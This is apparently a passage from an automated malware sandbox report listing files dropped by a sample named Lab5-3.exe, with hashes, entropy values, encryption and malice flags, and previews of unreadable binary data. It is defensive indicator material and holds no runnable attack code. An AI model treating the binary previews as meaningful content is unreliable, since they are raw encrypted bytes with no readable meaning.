                                                                                                          SHA-512:71131B752CA96F89CCDAA7816EF7BA15E33FC9FC580233D6BF001D1ECFA6484FF5C415044F6ACEC454AAA536AFE4DB66D28C3B0170E4686F832BF20382719686
                                                                                                          Malicious:false
                                                                                                          Preview:..Mo.}.5....%=._3(..t....lC....#.Uo.X....C4.....l.!"e...2..y9.....$?..#S.&..q..Y....}...}.....~.......n.hH..}h.q..kB.t.k7....TyO....7....na..u.T..MB...sY..;M.)S.|....0]....G.&.ocn.z.hW..n1.Y.....d>'yw.7.<...n....l.#.H..X.i....~..`*y'...C....;.@h.7....l%.l...D?.V.q..=V...XO1.....@.K.....<..v3.!_.U.m.C...a.+f.WF............`sx.JL.y7^.)j..Y.*..._..2:3.......`.......r...5...P..k.?.1d..Q..8..e...M.....P....2..z.k.. $.4...P.B..x.;w[={....-.j.f...Fd.K!.../....~z...>..u.OO..>H.K.I....6z.....iX.O...4..d......*..Y...?.u...<...]...D.a+..K..pH.2....l.'v;...Y..pq'.X.J...o..]....c....(D..M...n.3..Z..B..'.XO.%...+.a/.v..r.\.+Q$...\|_-...U..*.H...U...7.....^k.....C7/........."..d\.Q..%.O-EV...xXB..t..i..71.U...xe.0...[.((...=T)....Wn<.h...C{>*.R......U.....%..UH....V...n5?..R........dA...O+*..*..(...fv....?.2...F.Cg..b.Jm/.<JCtjV..m'.......W..v.OL.C..."....../.........GsE`.j...o.v...r.5].b/.......sz...z..Z,U.)..h!.3.$.1...z...s.#.z..!..U.Ay.:..N......].X.(Y.}...;
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):14016
                                                                                                          Entropy (8bit):7.986568653792153
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:Kc4zvWEHEFhQ53nfQHVbpEv3gvHuwNMlge0m4BwiB/Plmtb:F4vHEFG5P0MSuwI09BwC/PUZ
                                                                                                          MD5:3CF3735AD3C950065367CD9D20027395
                                                                                                          SHA1:27FE66A3CD5A27C8FF4EF9C614F6CD02BD486B5C
                                                                                                          SHA-256:07F27BD9B053E6FEB08F25BF16BC03558C39A2329BBE736DE3FACB07219E9FC5
                                                                                                          SHA-512:544AEBCBBDD411FCB2457DFD3D45A9F14EB60A084138F89F058F25793DFA6B74A9F7DE12CAE5735E186AC1A05672594099C7A4149AC169B2FEF6DB5E3885C0E4
                                                                                                          Malicious:false
                                                                                                          Preview:..D..a.K< .B..p.jC\.m...@.5Y]....o....I.HN..+.^d..M.....^hb.P.../e.L;....5...RT...H....p.....M..L&/c97L....Q.5{........k..Ia.B..x....yV)Q......!.Wt...m.....~z._G..2...n.@..)S.g.N..+.(.....z..(FF.....0.."......})zF......'.uZK..m....#...}.>..Z..I.#.8..P..KA.yG>.....()..+*&.>....j!@i..lR..u......an..5".. .....l...M..4.L.......iE.t."Z#.R.V...p~@)~.).L.f..g.*.xj+..%...H..2x....$...".E.K..'.rLt..%1..(......[......h.%..}..L.2..@MK.k(]i..O..C.....=i0.....\Kc.........&..:.....0...P..p.X....5.....I.hbR.Q+..h3.YK.&.\i..1\.rJ.|.,...x...%q.m..........Hc.=.H_......9..!!.T.e..c[..'......W..$1`#..].p......T...(.*f?.9R..\,..ON..s... ..m[.}.... .........-.\.Y.v~.w$...nA..x>.!....xo...S..Y..2..z.v|.>.}5Jp.. W.#.L..i.....4|....=Q.r...QUmZh.....+/.\......+/w.5...:h..|.~.|.?Q......)..V..J*.60..b....3.w...''.:>..[........ss...8g...7......NK...t.kJ.G....a....J..f........4.S^5H..Y.4bI..e.ykg=./2.g...)4B.h..q3;.....Z2-....9.w.A~........2........L...+..U~...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:COM executable for MS-DOS
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10784
                                                                                                          Entropy (8bit):7.981046972113234
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:JOQkJWKBZRunH4/x4W4L/6mtGASlTjQdO8+Hyj2TeZkklI7q4PingC42F6vi0Cb:EQcBZVu/tGAKQQmCvOI7X2FKitb
                                                                                                          MD5:05D512A9700FF3567B43CBC67C1E7E43
                                                                                                          SHA1:58B741AD37D5CBF484B34470AF72C1EA7E45503A
                                                                                                          SHA-256:1F02F683C44E5612FEDD1E7BDAD1142815475A20BEDE16210395F4A47A531326
                                                                                                          SHA-512:66557F3472B6C90C6EFFE66EF813EF55AA747034F43D2EE3A164F29EBA68629CBB3A9136CE4A69596EBF8E28E0EA87B178144B832723A2C66A28BCC556B98032
                                                                                                          Malicious:false
                                                                                                          Preview:....v..xQM..X....iz.m...!....yX.@ .i..].N...b/..`_\....!%.sM... t.&z`.B......A:CX=..*.7...]!......{\..n|.e....l ...b=..E. E.<.X..L>z..8$I.$....u..`a.5|6..Fj.._..-@..{V.B.1.mM0y[...o...qB...At.U. ......E.N1,A.>.@...[.U...c....?9.K.<.2..- ..M57...#>a..'......c......vDz<...C.F.b.P.>s.q.C..v.P..`T...UI.L...._.....r...S.peo0/.....O.zQ\.q...7\...29_.'....K....U.V..9/js=..~.Y....D...6S.v.^.#Y=#8..U..9V.ey...29-.SQ`Y.T|'..A...io,..2p....&Ic.jv......a.$r.........g.`.:..0.I.?....E.H.....V...=8oG...\......Y.S..,.y.c...[.i.*b.Nb~..z\..\(..I}.(.s..B.V...{...l...{....w("{..T.[..0o.;....^.<.....].7lj.=..._ B..aI[../..E.N....b.t.#\..\...=...|.?k.h.>XE.n..z.T..:&.po.h#y......:j.GVx..W....6.gUV*.Z..w....W..+]v.[.*. Q.q.....VYsx..2..xSu3..B....u...;.>m...Gq>+.Q...n.Uk.O...;.....'}.J....#.....hX.95(2O...b...Mq>....;0[.....&....=9....;._..:.h;.....r..:-...;...S..C.j...jg..Y..sL........F....X....od...6.dA.B..D..xz.5...gN....rG...1.i."QaI.!%......$.'zd.....JL.f..7.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11408
                                                                                                          Entropy (8bit):7.983556654613115
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:JhKBoY6Rqtnh755uPguLmVJ3rlsntSsa4oJmZKEb6LgWGPy0Cb:rKByqtP5NuLo7eUsa4olM6LQ6tb
                                                                                                          MD5:739E6109DCD01EB9B16ADA688E64AA83
                                                                                                          SHA1:597A876ABD7578FB11A7BC832D7DA79DA5DBF52A
                                                                                                          SHA-256:528DD006B22180236FA3C031356E353C0B6C5B14F9697671B938D333C904EDEC
                                                                                                          SHA-512:4341DB2C1F85F00136BC8C77666590070A34FFD0EE8944AD528CEB64E89F6E18E7B8CB5167432240825C9FF4D7008F5FBF171C2CB22A73372BE952FF31DAF053
                                                                                                          Malicious:false
                                                                                                          Preview:k.0..RRj..^=..M...R.W.o...Q0r..Y.[J.z .o..m.....!.JAP....m.W1.|..C/.l11../.k1..Z..,..N....."......C.....e$......&t].u.......}..-.(S....bl.../..;b,.!...........\5...h..g.....N..h.{ ..R<.b...qr.Zl.h6.f...9..6O/]....]F0;5.....B.X..aZ...p...L=,..P.....JgZ...o.....o{5>..8c.i.C.=kF^8"s.R.M..N*....,$(..?.L..Y....~x#j. ....3M|...)8..;...1.A....fj....is@+..^...Id..2.[..J.n.^...\qK0z....I.od.....l...-Yv\.....rg...G..`.J..QV.....#..{GN3.L.["!.....\a.Yh.... b..4..Qa.c<.B.9....d.$..Lo.7.....|a+..m.C....0s.s.......b......s{..d..|.^.S....{....!mNj...}......0L.?..K..._.....X{.1.cr0......W.....m..X.eq.....Y.Q....O.....4*............{_......0.mg..,P/".W9.9.@+..ZW....?!.....==$C.#..5.d.-.gp0}.......%.%)^d.W[..dzw..H....t.......z...S...D!6h0.-. ...h............w.4E.".!.L.../f....D....\...v.a].I.....k..].r...Z..P2TE...>5^!Q....)l../8P.......C.Wx...q..`F.x....5 .,Tu...r...>..t....cA.iDg.GP.s.......L.0...U.S.....$..\c. ."...?.W(........=."......U.~).Ylw.)..........
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):15760
                                                                                                          Entropy (8bit):7.990280326347475
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:8Onq7vtDlvv8F3UsJYp63TQX2Vph+JGrncKmtb:84kF1XsJYkEX2B9Dc3Z
                                                                                                          MD5:B26D3E5E4267583F2DCCA7AA4F0EEFA7
                                                                                                          SHA1:B00CC6C12BC0761F884FEAC5E581BDFBC7D9E9E3
                                                                                                          SHA-256:4F0B0E3AD4E0223636701E424B23839DCEDF9FC28CD86829F30093565BF63818
                                                                                                          SHA-512:8A0A2A8EB0E486EA4BF58A9DFC4B559D8B7117FCFBB17828EFF729ED20C5A35463500F0E2A6886E0A0A7712B74A78C8D8EB0464CDFFF51B18F3B0791463A0B65
                                                                                                          Malicious:true
                                                                                                          Preview:.#...P...H..,.3...Z.....B../@Y`.6Kv....x.n..1G..@.$......fp.]m>.2..vMfG.5.hQ......n.+.....*..L...*.p.).._.zb.G......5.p..e.......l.2.H..b....G. $.'||]Xj.a86O..O..t.U.P.3..bn.!...8.N7?...............r...{.;PU.......4.:.FB=^9.&y......!..#..7'..=......a5...^e3V.-..,..E..|.c..c.|C8...|...h..l...)...n...8.)...qd.}...-.^....Z.yER....M....J. ...K....=.5..a.A....4..7gp.4K^kg..P...f...o..}.......YM.=.c..@...1..X`...U...j*.#..aW.Q.)#.d..0.(j..x.}.6"..o..+..D.Qh.'H.........~.2..r.....z...~].._.Y.o.... .....u.s..@..C.$Di.../K..KP..0M]ztJ......x..:...t...Ad.&..G...K7^.K....h.qX......$.!.h{..8zbD..LV.6..0......R.<y..Q.F.6...n.U...S#..c..].V.V.....3F.C.$0..M.F......E.i....M.........hNF.$c.:L....2....vQ..sgR.....S...q...+..54...!.A0-....%.........'......t..FYR.@.V....+."_...u..}QC...o"(,...9...laa\.Y.:....\.......s..f.:.......v..........#.<w.p..j6..d...n. .....X..T{.$.Y.y..Oq:I;w6v..w...&.Y.*3.+...W..h.0pT.Jk....(.K.$$....rA...G.c.}U#K1.\..@..........W
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:SysEx File - Solton
                                                                                                          Category:dropped
                                                                                                          Size (bytes):17328
                                                                                                          Entropy (8bit):7.990367021355765
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:U1/PgIxqHu/E0ZiwprrHFcDdQ9vq2vKNuyPpotuW9tb:QgIZ/FZiwJrHKKzeuqouMZ
                                                                                                          MD5:68CCAE033C2DC0CFB33704005F2F0E0D
                                                                                                          SHA1:3B8FF9ADB3F3470AB159B33291A1A41C822CB06B
                                                                                                          SHA-256:FFE5C5385C56ED1BBEAE41294A8FBDDCCE268931BC147D9C320A3816E75706C5
                                                                                                          SHA-512:67BAC497FB2D766960D135760FB258252301A753AF4879426B5795D789D37F2F5FE320F9FA517F9103B953B0BB4B7C943B1E1509E6A402C6D47BAB000EC71A38
                                                                                                          Malicious:true
                                                                                                          Preview:.&)..c.^...=..)..x.p.mO5-...^.X....3<....V0.39<.l..I8;......IB....d.Y.`z.RXZ.>..^..E.M,Q.z.....UPRm...<T...b..9h....b.!.E........N.P...}.@...).....n...'....v.../.(|.s.wI....c.!.r....[..P.p.W{#}...R.....8.=............F/.u...#..7........_.hw.p^....1|^.Z...7+-..1...!Ll.w6...........E...p9..-..B..8I.%{..m>.k.z.9....!.H.A....p...l.w..b.8."5T,g:..{=?(.;...z.h..mO.T0."...9\T.].aPP...V..K.5..u.J...0.....B.......|....CZ..z{vqQ.:....M...doJ..3~.#k.).q.>..........J-e..rM.J.f...]=.V_B{.....y$rD.o..A.#}K...l.C..5./....2.(.@...'..o.r...u.5vd..1.h.8..d8._..M..HG..l.r..}..),..f.F...u.H....YC....E..."#......f![.R....W.vS|.......hR..M......R\.?.d0[.z...p.t.eT...z...*u^.Vns..:#..G...I!...2..*........N.5.R.3a.s.td..6....e;"K..F.jf..y.g...#.%..?_u..;.,.4l.......$M..z0..@.q..daf$..D.p..y.*.2a......W.../^@..]..Dil.a....."}G...,.NAA.&.8....G.AU$..c....TRi"..P.y3.q!..C_.g.E..h....Nz.....y..P.9..X.d...T.b..#..."...]..{...bg.S.......s.........@qu>..dx.eI-[]I..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10944
                                                                                                          Entropy (8bit):7.9853608901739
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:XceWVmP4uWr18zaoUu0cy97/+jaVtXgGDpNG6ynNOtypnRAfyjzW0Cb:XQsPWrdVsaT/LynPBlutb
                                                                                                          MD5:B15A34400078F5A272E3F253F0DDCE4F
                                                                                                          SHA1:0BB563CB28277F00BB3036C2FEB4574667D52F6D
                                                                                                          SHA-256:9DF48AD7363A66611653D3695BA4943563367FD0B4BE9DE4CF588CA18ED7E8EF
                                                                                                          SHA-512:96D4585F7A003768889008E358F26A364AD0826E1A751647CEE9FD7E766527D172CA79B6FD1E2D1D21DD9E538B77ED463044DA96450BEB4483021A6EA82EA5A9
                                                                                                          Malicious:false
                                                                                                          Preview:..G_.....zo...............5..tL..:ql..F....MN..!s.....X.Q.1...l.1.(}....>.{.M.h#..i..x....b..Wgo.......N@.e...<.....{|.1\..|.&..]..j..Ca....2.H8.T..(...As...RD.A.. .0P.R2..n=/...enk.].\V3..#...e@.."/...z|.$9...T..M...#...1.....x......v52c....D^......}K..?.<..\..A..?...y.O...C.%...v...X.8!..g...O.....z.u.sh...k...(...NL.i..(1g...Q....oE`...Oq.....G...A...@.14.%.`f..K\..C.{...#pM.......!...pm+.Y...P.X.|4..b.A...S\_[...%5...J.M..SQ#.t.d4.%..3<M#..hc....%..MW.<p....`.'../]*{..8.....v.w\@..O.G...\Y.Ca/0.-;p.lV..(.5NV..0..gHc..Ml..kz...^h.s....V.?;.>..9.Nnzs..w.........e.....V.._>}.uz9.KR.^+..:...A.gr.....3.8\.....,||"D.3..{Z.../....}...2t.....3.Y.=B....j/..H.'X"..................f..S.%l6N.8E..L?.#....,.dk....od.@a'.[U.....$..I@@..Q|D....T...(.....y*.......FPi..I;..3.....i}: 5.\=,.8..k.........(;x^.0=..Z..F.ja.U.O.E'....{[.}.|......e.M<..k.(\....-:0.....J.....N,[S...b~...-...V.?.:..+.......=...V...!...H...G\,.}...Cx....j....*\k..BJG.K
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7984
                                                                                                          Entropy (8bit):7.9814838179421885
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:SdVkjfj2GVfy/qNciKmj9bWqIdho0rv0rTX0Cb:emPnV6iNdKN/Rgrbtb
                                                                                                          MD5:85F536A32B9BA7E0E60E8DBD37A4F211
                                                                                                          SHA1:36F930976B968C0E0EF50542D5921219DC236A60
                                                                                                          SHA-256:804A63151BFBA477037DD9932C1D69A95E7B2698B463812CC8FB3D521E0CB14F
                                                                                                          SHA-512:148816ADC2A83BD33F03F06DC60B75A2D711CCB05A77E6D732BD3A052CB9B490C15C355B3D55D15740F114030895786D9C6C5FF4FD7820AE610D8440FF21CAF1
                                                                                                          Malicious:false
                                                                                                          Preview:..t...Ys..6.8.....E....R...nX.......W..(....F...f.cZ-... 0W..z....Q..."....=...........d......A6#..e......5xQU.S%H.6..bf.@.....b/M..3<..V+....Z.g...X^.I3A)`..T..}....X<.V...^.u.h...f6......a.E....."Y.R......b.....}.....^(O...w....9n.-..no....>.-.-O....F.. ..G....D...;.o.Q.....n~..q~a+.z...}.....N....\l=.KxV...I.........Fy....*.A..GX.........-a..xE..@d*\fZ.R.^.f....z.Z...M`c ....wj|2..`.B..z.7.-..N.8P7.....Y.l].c6#.N.U....*.h..?1.h..j....".t....{s......*...T..H=8^.2.(....#.......{.=.i..=.s...Q.}...".'...8.V.R..\RIO....L:.*..u.....h22...f..SMl[.}..M..7A'.k.....lJW:.H..?q.S.&.T.}.4....=.y7.....=..%....V...cx1|........@.D.E...E...78.:..a.7...^..[r....Z.n.+.t=..km.E..3.\n0ijr..I......F?K...D.\!..52.\f,Vk....cC.u...........<.[....UM....$..=.o1.u...I..p..W.q.PT.i..$K>z.B.....-..l.7...@..........5.....[........U.....1.".G.r....8..Fs..n..=.<.V.1{+.(h...i.tS....j.n...z;..v..H.....K!5.......p.3l^.r..h!.y..y......q.vH....8x..5.v..s.I....t..<.$a
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10080
                                                                                                          Entropy (8bit):7.979529351711304
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:ORPp9auxbGMSkDi73RrLZjY/twUcDMqzBNIUELXmvhMD0AQlA7so0Cb:GPXrqM/DcRrLZjYHE3NIOZ4NH7sotb
                                                                                                          MD5:A4FF64B9A21682F97394D97479B4F025
                                                                                                          SHA1:E88F5086339ECB18031CF5D97845DE66AACAF6A0
                                                                                                          SHA-256:1330E626096886DF2DBED5C3E1C95E306B15704D9A466D5CCE3F50D70B0E6F84
                                                                                                          SHA-512:891319FBD79E2A8B68A3BDC2AA802DC7BC5CF26CA44DA667633CB14CA4A0BA01064164E6FA92D0F5EFBA98D090E1BA2689A5FA4E5DC7AF33909D0C52C3A961A9
                                                                                                          Malicious:false
                                                                                                          Preview:}...2 ..X.......<.#..lF\..%...0..wx.l..n.K.|.....4..E.w.".P........X..4T...9#.I....I:.bg..i...$.sC&.(..w.".7..b..Tb..Y'...<J:]...F...g....eJy..,..R..L...#:u#.v.......w. .&.IS...EE3...Ez..H..E.......A./4Y\H ;...H..c.u.....jE4.*>.e..W:....R..z.-`.!.pSo!.............6n...B....[..d8...V.(.....= v..,.......S.....]....U[..;.> .|.-......C.I..-.Mc.dR......p.....?...5.vWe.}...r....@.!b.....3l..V8wc..p.v.x.P.MH.....k~..`GfS;...%....j..n.m.d. Ha.7w.}..]j..V....J....{.F.~.....E.S.....?..I.VkA-......yM.e.(Y'/7.\.8&..J...}>.t..pE..B..gl..M.q..._...KB?a....._95.n...20..R...f..]r..-...v..C..]....4.x.g.jtVtjd-...$.#*...q....RQ..+u5.s\>.5.k*..L^G!{...M........+Jzj$......Z.5[....n.,..q.vs..}.[...!~....f0...$.^.e./.N].[\.`......8.........T...E.qt....9.Z..u..... h...........!...g....{}...g.o...mJ.C..V6.Y..,...qu...Y.lI..|E...\.v.Z..3s.,.....@"_.6_..,.q*...A..a.'...xCc*...Vd=.Woy.bE......q..L.........\d..../!v.....#..m=$%W.>..`E`n....".n.'.Q.S.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12528
                                                                                                          Entropy (8bit):7.9852037895149035
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:lH+Oo/UTA+ehGm7ODUIA3ygA2P51gTAzrMLoxtstWgPYcvivsjtol3XLc2l/9NGq:lH9y4A+3URY4MLADchh2l/9NNtb
                                                                                                          MD5:41124B9F1AB7695B4B756B2AE61278BC
                                                                                                          SHA1:0FC465F09DD602EC8ED1FDB4A720EB4BCD3885C7
                                                                                                          SHA-256:F626AB6B3D918183E0C4391CDA3AD242782996E3ABE79C9F8801B789C8B16D63
                                                                                                          SHA-512:6DEFC8FC11E00C3FA632112483BDBD04C3CADA04CAF9E9E28863D75E5619A03FB34AE156DE805AEC8FDA16F91CA1B3F71AABF1E040FE8C800C8058E78DBDC095
                                                                                                          Malicious:false
                                                                                                          Preview:s..N...7.0.)..e.a3........n...M....C|Q..r^..r".@.....n.s..O..`.\..%.........%J...Y..Z &.....UxL..:..aU........t..?.D..v..7....eU.S.u.M.......UI.Kr.).|..2O.f..6"...CI....9..1......M<..0./........6}U...H.-xk+F:.aP.R.......!6... ..[..x6.z..M.CU.......8^T.f.n.Im....t.CM.s..8+H...._>..F..F}1+._..A.J<..WPE...u-X......{.J.E]...JqG.W.n}..w..'..eL.......W..'^...;.?Mb...G..!Z..Dnn.,>.].w@N.....!.:...l.u....E1'.fBN..Pk.[.%MHK......zC.QELGi..B...3ss.EO....*.~HVHO..W.=...R.9.'....r...(.....o..Y@'.I.P.u...2q....(T.....j......M.%|Zst ..k.l...8..D..}]2....H..Z+....FC".../..3b:E....4..G....-...d....g..y.rMfOL./m.cK....t.......]..+.]H.g>..".hhS.[.....g.W..S]...-.f.gF...H..^....:.0k..i....x..oA.....m...T... .|e..x.QP.....A......zym.bFr.:...s..6...+i....7A.....>.....|.........;.N.!^..F-.....hG.#."r`.>#Y...'....|.&...ZB....f0...$W.f..X,@>l.2..........R..%.... O......(7i..]...}t.$..).>....?d..h2|Z....8..o.=[..YMN....&...V1....N..l.....\n9.~W......'....V
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9920
                                                                                                          Entropy (8bit):7.980887643281532
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:AijHpDG2yO7OalC0SIgaQ8xPmtWX+l5Z0pSYqdTdDstodLyxNE4qKrdRyRJJdMUq:AUpDG7OJ00UblxdDZy0z43SW/Z3Ks0Cb
                                                                                                          MD5:45B2A4F68EF2D12FC0BFF0449B19E9B9
                                                                                                          SHA1:66D333CF1B323F4B9DE53C0226A2077A7BF0467E
                                                                                                          SHA-256:A393BDC0B51B1A7B45F8BF56874DA95DE9AF53C695D5492BE6465F8652436AC8
                                                                                                          SHA-512:8BAB5B911F4E705DCB5C223A715C4F6A8E6E1B9B92ED207A8F409BBACAB2F909BA893EA9DFC852F985FE61548EE26265A0E28C3136024B8A6D670EAC37786561
                                                                                                          Malicious:false
                                                                                                          Preview:[.......7....../..c[V/..]}.4t..>M...>z.t.}..J.0..H........:.B....1!.D..A&....;..e..(T.@.9.D@6.Co.}.....).]"m.:".1...3.w..M.=..%z.f.Io..._..5..t.:E....s.eI...f...>...(......LE....\)...5...S.O..`....3P)..C1..2..8v....c.3xg....".p..[.l..|..tnO...]......MS.............,'..%...f*..t.....xN...._^S...l.g..6.\..j.[3.'E..j ...$.H....F.,.?..........j.ld.[\..$.....) .........&~{...H..a...Rw.0.7...iP..$..M..,'......':.`....6.n89.Td.<&.K.s.l....6#.r9..t..Q.[x...T'Ny....2.S....wM9.j_@d.c....b([Y....@.e....J)1..`WO.O`..C..a..s-..$..U!e...(.|l.>.:..x.XA$...=l.@.....=...D.....?E....dF...F...Qt......J.c[..........zd.v7.H..{...B.-5M5...z..)L!<....Sj...d ....EI..y./d.....T...|...;..C..h.]..u...}9.(..G.3.7^[@....Q./.b.r.._...|..y.Q.Of. ..z......9...?..0.....7.J.xx......c*..B......."&..N.kt)..$Yh...lj.`.t.T4..8....^...{q.u.\e..T....n.K..Uz..^..h*.....o..8.......|..p...x1c`...luoc.d.y......U......\.f.....$g.Nf..9$z.L....p.j.w....%f0...>.sax4...<}.h........h
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5552
                                                                                                          Entropy (8bit):7.964764176820701
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:4t0Ztdl54q/Lmbvxr/ZoljR2NJ9k37SUKkLSSCEyfNgJGx0uKeY2ElUJ:FZtd9mbvxT+lk7x5kLTkfyy0Cb
                                                                                                          MD5:06658F7BDEF64FC2680B66DAC1311F1A
                                                                                                          SHA1:7DD3776F4BD31747B5F3FAFC30E002B7E9394CEB
                                                                                                          SHA-256:C065CF0F39C88EDA0FE6F3941CD2E50ADDB77176577CD99E95D7BA52392DCF6B
                                                                                                          SHA-512:82BA58D99ADFAA110C492083E64A1A948F6052B102D8FDC647F994B0D615E310C94BC0C1E55C23B21AA28BB3F02F63D8A56BFB3332EDE225BCF369E4BE20BB6A
                                                                                                          Malicious:false
                                                                                                          Preview:...2...q.j..$.5.uQ.q.....Q...."R"O......R....Q-.L.........c....z..e..-../.=..+5G.H}&.%......=.....`{.RQ%.hM...K..m8E.9..He..R.#..(..2..,...#.*..x....W^......jr<=ir.._.|-..nN...{P.mS..}....]\2.5..s...Pf\...]B..|.@.....,...0..x.....=.....l;...u...O.G..W.......{..if!jg.e....\..8..x.\...3."........S.c4.!........^TDo.....d.UF%[.j..f....<..T....K.w0...w..r.\.K4..%.R.:.....~....Uq..]..Q.Rt..}.! ^.....~...j....3cq....5..M4......j.#.Q.!L...d..A%|....n../.q.......r.....d...4.,8 .q..?..3.B"H..Vr...?..yK.+..l...5..e.S*....qijW.....:.'.C....NF...1s.'..q...-8+.......*..`t...".O............zQ......iE..E....~...]\..h)1........KqyT.+z..L..|.J. ..Z.$.O..BF..9A...I.uB.6....a..J}VFE....?*p....%.......9...9..Lv..2.....4..j...~..j..dL......=.a)=..vdm..yr.....#kz-....{.d.t._.L.$.^..&.@.......e......A..{.:..&\.N....N+.92...9..,a....MS:`..uV(..._....#.v..6.]..M..-.y..C3v.{..MBrc.b...RS.>...[@..&.h.F....i...:V.h.C.....DOW....D.WG@...b...}..%.tCQ;U.h.......LD
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3264
                                                                                                          Entropy (8bit):7.93839571743491
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:bvUkqV1qVH/nq7YNWSKbIIpOwRoeJa5Gx0uKeY2ElUJ:bvCwHBQmwKaaC0Cb
                                                                                                          MD5:3459A9181B68A4D801266A433292634A
                                                                                                          SHA1:404E63D13C10BABEAD906DBEF0E4AAB26B88177A
                                                                                                          SHA-256:4CCAEFFCEEF27C3C1C03E94F3BC39C26AFB6EA84D83F21D9CE737C2B1283B426
                                                                                                          SHA-512:CAB6540BE5D6086D0575C8767428AFF06EA93B9317EEEA9B5D1B3CDCDE8A3C2B3E1267A6242E5CBC581E7E582025D0E2B0A47E90AA70748AF86C33B13D791696
                                                                                                          Malicious:false
                                                                                                          Preview:..yfL2s..a.!..Y.(..R<.Ov.^.G...L........I.al.H6..P]!.Sa........P..".o.3r..>...l.V.|j.7Q$B.......f*.O...l7/ao...7!Rt......?D;.f..*...0F.......WD.g ..c8..iP;T.._.1..f..C...........M.d...p`g9-..eo^E..Y.y...R.=E..-!M.....q}.V.i.."[.....c.L......B..".@`/.....3.\.>........:.CS.."....A.........aa?5!2..vM.../2yA..W[...Mdq9/....W..y..g.H...diu..U.9$[.J.....=3.`..M...g...d.....'.Z..H.".gG.8.....X1./...t.\.IDjhl.FU.{...x..i...........B......,=mq..57........c!..8.A.2%.D al.^yS... ...A.:.G...2....U...I^.w..T..0-=P6.....p.E.q-...z..(.#.UmE.l._.+%...0.^J./.z9.vN6r..........6i........Q.r.{F..Y....2.s.bL.....3%..ESuk.....9^u_(lH.R...X.....O..Z.[...q$..z^.*'.."........X....\..x...E.&.......D#.;=X.S....D.X.\i..G:..I.>{.w3.(Qu0L....j..{:t..&Lic!.^......)..........,.slK...(..R...[...Nf....&..pHv:....u(...Y..rdG7u.|................x.3..:.C.ZV.i.R..:.....jeCW)P..X'c...=(.i.;e..*.3n...`.......|.Lf..;....9...l.8..>.N..u.9..y.w.!.H..]\..k.6..g..&..5.~..OC0..p.....i0E.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):188400
                                                                                                          Entropy (8bit):7.998998178734376
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:i3QCHoyM3tryScmZtV3uxsoQymWpBCSErDfdHhZOSzM/sRFQN8G0ejBmkLHjTpNV:i3QAtM3t+SR8soQymCBCDrzQ7wBa9mQd
                                                                                                          MD5:FC179C72598C5ACDAD3AC65DA65AAD59
                                                                                                          SHA1:20D6EA187AE4A277910DD938329137C299C9DF1A
                                                                                                          SHA-256:C6FD9201EEC4A279440ADC844B4C6708F9FF734BFAD5FDCC958A690DDC8204B1
                                                                                                          SHA-512:35EFD66C3E0C0B50EF310077AD150224C0606649269CD378A6F7AC45A077F09DC129C40AC755ACBC98E6B3ADF1B7142714D7226416756DD6223B5EB9BA5D63B0
                                                                                                          Malicious:true
